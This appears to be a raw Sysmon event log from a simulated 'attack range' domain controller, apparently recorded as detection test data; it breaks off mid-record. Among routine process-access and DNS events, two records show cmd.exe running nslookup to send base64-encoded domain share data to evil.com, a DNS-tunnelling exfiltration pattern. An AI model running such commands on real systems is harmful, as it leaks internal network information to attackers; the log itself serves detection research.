1791 10341000x8000000000000000202164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.013{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.013{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-2A41-000000005F02}7836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.013{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.013{2E1864BB-17C5-629A-2841-000000005F02}74845764C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-2A41-000000005F02}7836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.015{2E1864BB-17C6-629A-2A41-000000005F02}7836C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C5-629A-2841-000000005F02}7484C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nligds.tmp 2>&1 23542300x800000000000000043948Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:38.156{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A9D7FF41D060C21DBF6F9A6DDC73569,SHA256=D0259E3A5F99A58CC6DE452DEF1C91F3A7C44A769A18E478EB11F3E30893BBE2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.989{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-6941-000000005F02}5088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.973{2E1864BB-17C7-629A-6741-000000005F02}27885576C:\Windows\system32\cmd.exe{2E1864BB-17C7-629A-6941-000000005F02}5088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.988{2E1864BB-17C7-629A-6941-000000005F02}5088C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C7-629A-6741-000000005F02}2788C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvu.tmp 2>&1 10341000x8000000000000000202818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.942{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-6841-000000005F02}2792C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.942{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-6841-000000005F02}2792C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.942{2E1864BB-17C7-629A-6841-000000005F02}27921476C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-6741-000000005F02}2788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.476{00000000-0000-0000-0000-000000000000}7344<unknown process>-udpfalsefalse127.0.0.1-52954-false127.0.0.1-53domain 354300x8000000000000000202814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.476{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52954- 354300x8000000000000000202813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.476{00000000-0000-0000-0000-000000000000}7344<unknown process>-udptruefalse127.0.0.1-52954-false127.0.0.1-53domain 354300x8000000000000000202812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.476{00000000-0000-0000-0000-000000000000}7344<unknown process>-udpfalsefalse127.0.0.1-52953-false127.0.0.1-53domain 354300x8000000000000000202811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.476{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52953- 354300x8000000000000000202810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.476{00000000-0000-0000-0000-000000000000}7344<unknown process>-udptruefalse127.0.0.1-52953-false127.0.0.1-53domain 354300x8000000000000000202809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.476{00000000-0000-0000-0000-000000000000}7344<unknown process>-udpfalsefalse127.0.0.1-52952-false127.0.0.1-53domain 354300x8000000000000000202808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.476{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52952- 354300x8000000000000000202807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.475{00000000-0000-0000-0000-000000000000}7344<unknown process>-udptruefalse127.0.0.1-52952-false127.0.0.1-53domain 354300x8000000000000000202806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.387{00000000-0000-0000-0000-000000000000}5568<unknown process>-udpfalsefalse127.0.0.1-52951-false127.0.0.1-53domain 10341000x8000000000000000202805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.920{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-6841-000000005F02}2792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000202804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.387{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52951- 354300x8000000000000000202803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.387{00000000-0000-0000-0000-000000000000}5568<unknown process>-udptruefalse127.0.0.1-52951-false127.0.0.1-53domain 354300x8000000000000000202802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.387{00000000-0000-0000-0000-000000000000}5568<unknown process>-udpfalsefalse127.0.0.1-52950-false127.0.0.1-53domain 354300x8000000000000000202801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.386{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52950- 354300x8000000000000000202800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.386{00000000-0000-0000-0000-000000000000}5568<unknown process>-udptruefalse127.0.0.1-52950-false127.0.0.1-53domain 354300x8000000000000000202799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.386{00000000-0000-0000-0000-000000000000}5568<unknown process>-udpfalsefalse127.0.0.1-52949-false127.0.0.1-53domain 354300x8000000000000000202798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.386{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52949- 354300x8000000000000000202797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.386{00000000-0000-0000-0000-000000000000}5568<unknown process>-udptruefalse127.0.0.1-52949-false127.0.0.1-53domain 354300x8000000000000000202796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.286{00000000-0000-0000-0000-000000000000}2060<unknown process>-udpfalsefalse127.0.0.1-52948-false127.0.0.1-53domain 354300x8000000000000000202795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.286{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52948- 354300x8000000000000000202794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.286{00000000-0000-0000-0000-000000000000}2060<unknown process>-udptruefalse127.0.0.1-52948-false127.0.0.1-53domain 354300x8000000000000000202793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.286{00000000-0000-0000-0000-000000000000}2060<unknown process>-udpfalsefalse127.0.0.1-52947-false127.0.0.1-53domain 354300x8000000000000000202792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.286{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52947- 10341000x8000000000000000202791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.920{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.286{00000000-0000-0000-0000-000000000000}2060<unknown process>-udptruefalse127.0.0.1-52947-false127.0.0.1-53domain 10341000x8000000000000000202789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.920{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.285{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52946- 10341000x8000000000000000202787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.920{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.285{00000000-0000-0000-0000-000000000000}2060<unknown process>-udptruefalse127.0.0.1-52946-false127.0.0.1-53domain 10341000x8000000000000000202785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.920{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.525{00000000-0000-0000-0000-000000000000}7528<unknown process>-udptruefalse127.0.0.1-52917-false127.0.0.1-53domain 10341000x8000000000000000202783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.920{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-6741-000000005F02}2788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.905{2E1864BB-17A1-629A-783D-000000005F02}55527900C:\Windows\System32\WScript.exe{2E1864BB-17C7-629A-6741-000000005F02}2788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.525{00000000-0000-0000-0000-000000000000}7528<unknown process>-udpfalsefalse127.0.0.1-52916-false127.0.0.1-53domain 154100x8000000000000000202780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 